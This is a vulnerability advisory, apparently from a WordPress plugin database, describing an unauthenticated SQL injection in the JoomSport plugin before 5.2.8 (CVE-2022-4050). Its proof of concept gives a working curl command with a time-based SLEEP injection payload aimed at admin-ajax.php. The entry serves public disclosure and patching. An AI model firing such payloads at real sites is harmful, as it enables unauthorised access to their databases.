JoomSport < 5.2.8 – Unauthenticated SQLi | CVE 2022-4050 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted
2. Invoke the following curl command to induce a 10 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load' \
    --data 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'

Affects Plugins

joomsport-sports-league-results-management

Fixed in 5.2.8

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

5c96bb40-4c2d-4e91-8339-e0ddce25912f

Timeline

Publicly Published

2022-11-28 (about 1 years ago)

Added

2022-11-28 (about 1 years ago)

Last Updated

2022-11-28 (about 1 years ago)

Other

Published

Title

Published

2022-02-16

Title

WP Statistics < 13.1.6 - Unauthenticated Blind SQL Injection via current_page_type

Published

2022-12-12

Title

Web Invoice <= 2.1.3 - Authenticated SQLi

Published

2022-11-07

Title

WP User Merger < 1.5.3 - Admin+ SQLi via ID

Published

2023-09-12

Title

Booking calendar, Appointment Booking System < 3.2.9 - Multiple Authenticated(Editor+) SQL Injection

Published

2015-03-11

Title

Yoast SEO < 1.7.4 - Blind SQL Injection